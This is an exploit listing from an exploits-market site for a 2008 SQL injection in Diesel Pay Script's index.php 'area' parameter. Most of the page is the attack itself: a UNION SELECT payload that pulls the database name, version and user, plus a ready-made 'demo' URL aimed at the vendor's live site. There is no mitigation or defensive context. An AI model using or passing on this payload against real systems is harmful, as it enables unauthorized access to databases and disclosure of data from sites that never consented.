[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Diesel Pay Script (area) Remote SQL Injection Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3699
Category
web applications
Date add
19-09-2008
Platform
unsorted
===========================================================
Diesel Pay Script (area) Remote SQL Injection Vulnerability
===========================================================


[~] Diesel Pay Script
[~]
[~] index.php (area) sql inj
[~]
[~] http://www.dieselscripts.com
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 20.09.2008
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/index.php?a=browse&area=[SQL]

[SQL]= 

ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*

Demo:

http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*




#  0day.today [2024-12-25]  #